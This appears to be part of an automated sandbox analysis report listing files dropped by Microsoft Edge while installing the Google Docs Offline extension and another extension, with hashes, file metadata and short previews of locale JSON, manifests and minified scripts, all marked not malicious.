Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.751992630887702
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
MD5:	250C48F4915DD4C0DFA7E7E021A4F066
SHA1:	092A98BF40D8C18280393BF3811A7DFA9A9FD326
SHA-256:	26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
SHA-512:	8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417833205646285
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
MD5:	236D2DD305D64C2B6ABD232ED53270DF
SHA1:	9F6885E95FBC4213631F0B0EA49C803D07D34136
SHA-256:	2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
SHA-512:	B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3777)
Category:	dropped
Size (bytes):	98880
Entropy (8bit):	5.414989230634404
Encrypted:	false
SSDEEP:	1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
MD5:	DC93A1045D1AD8D7ADD06B93B2FE79E2
SHA1:	CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
SHA-256:	D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
SHA-512:	025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3782)
Category:	dropped
Size (bytes):	107677
Entropy (8bit):	5.396220758526552
Encrypted:	false
SSDEEP:	1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
MD5:	E8015AC436B33034EDF7DA060E853A04
SHA1:	62D0F6EB0E441158A1F56F6E0C70D3D229B57886
SHA-256:	23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
SHA-512:	C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\c189a463-e759-4f64-b5b7-27377aebb49f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1930475688\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1930475688\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1930475688\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1930475688\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
